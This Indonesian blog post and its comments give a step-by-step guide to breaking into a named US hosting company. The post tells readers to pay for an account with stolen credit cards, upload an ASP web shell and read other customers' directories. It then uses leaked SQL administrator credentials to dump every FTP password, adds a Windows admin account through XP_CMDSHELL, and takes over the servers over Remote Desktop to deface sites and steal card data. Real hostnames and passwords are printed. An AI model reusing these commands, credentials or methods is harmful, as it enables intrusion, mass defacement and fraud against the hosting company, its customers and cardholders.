Trik hacking server hosting

—- saya cuma mempublish ulang artikel dari situs mana q da lupa tapi asikk lhoo…

silahkan dicoba klo berhasil pasti ketagihan….—————-
Edthosting.com adalah salah satu hosting service yang cukup besar di US sono, tapi anehnya banyak sekali celah-celah keamanan yang ada. Salah satu celah keamanan yang cukup besar yaitu di bagian yang sering disebut FSO (File System Object). Untuk mengetahui lebih detail mengenai fso silahkan saja kunjungi situs Microsoft atau lainnya karena gue malas ngejelasin disini.

Untuk lebih jelas sekarang kita langsung saja praktek.
Bahan yang diperlukan:
1. Sedikit pengetahuan tentang Asp/Asp.Net
2. Sedikit pengetahuan tentang SQL Server
3. Sedikit pengetahuan tentang DOS Command
4. Script ASPY.ASP buatan Vela iNC , download di http://www.Planet-Source-Code.com
5. Hosting Account di edthosting.com yang dapat dibeli dengan kartu kredit curian, dengan menggunakan proxy US. Dibawah akan dilampirkan beberapa hosting account dengan passwordnya.

Sekarang kita mulai:
1. Apabila anda sudah mempunyai hosting account maka upload file aspy.asp ke directory utama anda dengan gunakan ftp. Kemudian panggil aspy.asp lewat web browser anda (http://situs-anda.com/aspy.asp) dan default passwordnya adalah “password” (tanpa tanda kutip) kemudian tekan enter.

2. Anda akan melihat bahwa directory anda berada di “c:\inetpub\website\situs-anda_com”. Sekarang coba anda ganti menjadi “c:\inetpub\website\” dan binggo anda akan melihat seluruh hosting account yang ada pada server tersebut dan silahkan anda menjelajahi semua directory yang ada didalam server tersebut termasuk ke directory “c:\”.

3. Apabila anda teliti anda akan menemukan file c:\trace.log yang berisi user dan password SQL server. Pilih File tersebut kemudian clik “edit”, Dari file trace.log tersebut didapat hasil yaitu :
a. Nama SQL Server : http://www.empiredatatech.com
b. Username : card471
c. Password : ty38vxqxxx
d. Default database: EDT
Setelah saya teliti ternyata user tersebut mempunyai hak sebagai SA pada SQL server tersebut. Kita jelajahi lebih jauh tentang database EDT pada server tersebut.

4. Jalankan SQL query analyser pada ASPY.ASP (pojok kanan atas), masukkan: “Driver={SQL Server}; Server=www.empiredatatech.com ; Database=EDT; DSN=; UID=card471; PWD=ty38vxq|06;” pada connection string (tanpa tanda kutip). Kemudian klik “table”. Maka akan melihat seluruh table yang ada pada Database tersebut. Table yang cukup penting adalah FTP_User_info. Untuk melihat data yang terdapat pada tabel tersebut masukkan “SELECT * FROM FTP_USER_INFO” dan binggo!! Anda akan melihat seluruh user ftp beserta passwordnya diseluruh server yang ada di hosting service tersebut. Pada langkah ini saja anda sudah bisa mendeface seluruh site yang ada pada database tersebut melalui ftp. Jadi bukan hal susah bagi Edan_Tenanan untuk mendeface kurang lebih 2500 situs dalam satu malam dengan munggunakan FTP Account, tapi ada cara yang lebih cepat dan mudah yang akan dijelaskan dibawah.

5. Dari database EDT didapat berbagai kesimpulan yaitu:
a. Hosting service ini terdiri dari 11 server shared hosting mulai dari yang nama servernya http://www.empiredatatech.com, ww2.empiredatatech.com, sampai ww11.empiredatatech.com dimana semua server memiliki hampir 300 shared hosting dan memiliki SQL server dimana user card471 memiliki hak sebagai sistem administrator (SA).
b. Hosting ini juga memiliki puluhan VPS (virtual private hosting) yang dapat diakses melalui remote desktop. Dan juga memiliki beberapa Dedicated server diantaranya EDTDSA, EDTDSB, EDTDSC dan lain-lain.

6. Apabila kita mau melihat semua database yang ada pada salah satu server kita dapat gunain Http://enterprisemanager.edthosting.com, disini kita juga bisa membuat user yang mempunya hak sebagai sa asalkan kita login sebagai card471 yang mempunyai hak sebagai sa. Bagi yang tertarik dengan kartu kredit silahkan cari sendiri didalam Semua SQL server tersebut satu-persatu. Kebanyakan situs toko yang ada EDTHOSTING menggunakan shoppingcart ASPdotNETstorefront yang mana data kartu kredit beserta CVV-nya telah ter-enkripsi, tapi jangan takut Edan Tenanan bisa menanggulanginya, kalo ada belum tau tanya aja pasti dijawab, tapi kalo udah tau jangan ngoceh hehehehehe

7. Sekarang yang jadi pertanyaan bagaimana edan_tenanan dapat mendeface/mematikan (nggak jelas deface itu bagaimana gue nggak ngerti) seluruh situs hanya dalam waktu satu malam ???????

OK sekarang gue jelasin bagaimana Edan_tenanan dapat menghancurkan seluruh site tersebut .

1. Masuk di http://enterprisemanager.edthosting.com pilih asp enterprisemanager kemudian login server: http://www.empiredatatech.com dengan user: card471 pass: ty38vxq|06 kemudian jalankan Query:
a. XP_CMDSHELL ‘Net user edan tenanan /add’ perintah ini untuk menambahkan user: edan password: tenanan pada komputer server
b. XP_CMDSHELL ‘Net localgroup Administrators edan /add’ perintah ini untuk menjadikan user edan sebagai user dengan hak administrators

2. Jalankan RemoteDesktop (windows XP keatas) kemudian masukkan namaserver (dalam hal ini http://www.empiredatatech.com) kemudian klik connect, tunggu sebentar lalu masukkan user: edan Password:tenanan kemudian pilih OK. Binggo !! Edan Tenanan telah remote ke server dan bisa mematikan atau mendelete semua hosting service yang ada pada IIS servernya termasuk memodifikasi DNS nya, Menjalankan proxy server, menjalankan trojan, menjalankan BOT RagnaRok dan lain-lain.

3. Anda bisa melakukan hal tersebut pada 10 server yang lain, selama IP anda tidak diblokir oleh firewall hehehehe.

4. Bagaimana caranya agar password user Administrator? Caranya dengan perintah ‘Net user Administrator passbaru’ .

11 Responses

  1. War…..war……..
    Nulis opo awakmu…….

  2. hohohohoh trik inie boleh dicoba bozz…

    buat newbie2 yang pengen ngecrack server…

    ocreee gak…

  3. Maaf, nih nambahin ya mas…. kalo diliat, dari settingan tadi, bisa ketebak kalo web server pake IIS dan database server pake SQL Server. yang jelas, kalo admin servernya ‘agak lemes’ pasti langsung online tuh web server langsung, dan LUPA untuk mengatur kedua server tsb.

    Mudah sekali, menjegal langkah ini, salah satu ‘lack’ pada SQL Server adalah perintah XP_CMDSHELL, perintah ini bisa di matikan. dan kedua, kesalahan fatal, pada IIS Server, OS Windows servernya lupa menutup port selain SQL Server dan port http / 80.

    bagusnya, coba semuanya diganti, IIS jadi Apache dan SQL Server jadi Mysql, mmmhh.. ditambah server side script diganti pake PHP, ditambahin parsing input box dan request dalam form entry. Dan terakhir Firewall, tutup semua port yang gak dipake. Kayaknya sampe botak gak bisa nembus tuh…
    😀

  4. maturnuwon seng katah mazz…

    nambah ilmu mazz deddy…. suwon2..
    🙂

  5. Weh weh weh
    Artikel ku kok bisa masup sini ??
    Btw, that’s OK
    I Hope You Enjoy it.

    Edan Tenanan

  6. ocreee. thankyu3…

  7. hahahahaaa.. nakal tenan mas ini

  8. Woi…aku tuh bukan minta tricknya…tapi software nya….ada g sih?
    software nge-hack kartu kredit beserta cvv secara langsung

  9. ndak bisa masuk pun.kombinasi user dan passwordnya salah

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: